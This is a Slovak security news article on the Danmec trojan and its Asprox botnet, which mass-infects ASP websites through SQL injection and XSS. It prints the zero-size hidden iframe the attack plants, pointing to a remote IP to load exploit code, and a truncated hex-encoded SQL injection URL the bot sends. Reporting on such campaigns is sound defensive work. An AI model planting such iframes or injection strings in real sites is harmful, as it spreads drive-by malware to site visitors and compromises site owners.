Ako sa tak zdá, viacero majiteľov botnetov objavilo silu masívneho SQL Injection útoku spojeného s XSS. Dlhoročne známy trojan Danmec, ktorý vytvára botnet Asprox, získal od autora schopnosť vyhľadať a infiltrovať weby postavené na jazyku ASP.

Damnec je trojan, ktorý je známy už niekoľko rokov. Jeho primárnou úlohou v začiatkoch bolo kradnutie hesiel a iných citlivých informácií, časom autori pridali nástroj, ktorý vytvára botnet (Asprox) a svoju aktivitu zameral na phishing a spam. V najnovšej verzii trojanu sa objavil nástroj, ktorý vyhľadáva zraniteľné weby za pomoci GHDB (Google Hacking Database) a snaží sa ich infikovať XSS kódom, ktorý sa pokúsi využiť niektorú zo zraniteľností prehliadača obete. Tento nástroj je na disku uložený ako msscntr32.exe a v popise procesov sa tvári ako “Microsoft Security Center Extension“.

Škodlivý JavaScriptový kód je načítavaní z domény direct84.com, na ktorej sa nachádza len iframe, smerujúci na ip adresu infikovaného počítača. Stránky otvárajte len na vlastné nebezpečie, škodlivý kód by mohol infikovať váš počítač!
<body>
<iframe src="http://66.197.168.5/index.php" width=0 height=0 frameborder=0></iframe>
</body>IP adresa patrí pravdepodobne infikovanému počítaču, ktorý sa nachádza na území USA v štáte Pensylvánia. Botnet však využíva techniky fast-flux pre komunikáciu s doménou direct84.com, ktorá je registrovaná na Australské meno, ktoré je však použité z odcudzenej platobnej karty, ktorou je doména asi zaplatená. IP adresy, ktoré sú priraďované k doméne pochádzajú z celého sveta a pravdepodobne sú pridávané z riadiaceho centra botnetu.

Škodlivý kód sa snaží zneužiť nateraz nie známu zraniteľnosť, pravdepodobne sa však jedná o zraniteľnosť v prehrávači Quicktime.

Časť príkazu, cez ktorý sa robot snaží infikovať web.
/page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);SET%20
@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200

Zdá sa, že autori botnetov zacítili veľkú príležitosť a snažia sa využiť čo najväčšie množstvo prostriedkov, ktoré im internet ponúka. Preto sa nie je čomu diviť, keď je podobný botnet schopný infikovať pol milióna webov behom niekoľkých dní. Vďaka tomu sa počet úspešne infikovaných obetí šplhá na milióny a neustále rastie.

Ak vás zaujíma, čo škodlivý kód v skutočnosti robí, sledujte naše fórum.

(via)

Žiadne príbuzné články neboli nájdené.